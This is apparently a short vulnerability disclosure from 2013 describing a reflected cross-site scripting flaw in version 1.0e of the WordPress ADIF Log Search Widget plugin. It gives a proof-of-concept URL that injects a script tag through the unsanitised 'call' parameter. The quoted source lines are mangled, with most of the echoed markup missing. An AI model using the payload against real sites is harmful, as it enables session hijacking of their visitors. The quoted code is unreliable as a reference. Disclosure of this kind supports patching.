# Exploit Title: ADIF Log Search Widget XSS Arbitrary Vulnerability # Google Dork: # Date: 26/05/13 # Exploit Author: k3170makan # Vendor Homepage: http://wordpress.org/plugins/adif-log-search-widget/ # Software Link: http://wordpress.org/plugins/adif-log-search-widget/ # Version: 1.0e # Tested on: Ubuntu 12.04.2 LTS Wordpress ADIF log book search plugin widget suffers from a Cross Site Scripting vulnerability. Code: logbook_search.php ------------------------------------------------------------------------------------------------------------------- 55 echo " 56
"; 57 echo ""; 58 echo " "; Code: logbook_search.php ------------------------------------------------------------------------------------------------------------------- 93 else{ 94 echo " 95 96
97 Sorry, nothing found in the logbook! 98
99 "; 100 logbook_search_form(); 101 } 102 } The above code fails to sanitize the "$_REQUEST['call']" value passed to the script from the Widgets HTML form, allowing attackers to inject HTML/JavaScript into a victims browser session. PoC: http://[domain]/wordpress/?call=%22%3E%3Cscript%3Ealert(1);%3C/script%3E%3Ctextarea%3E --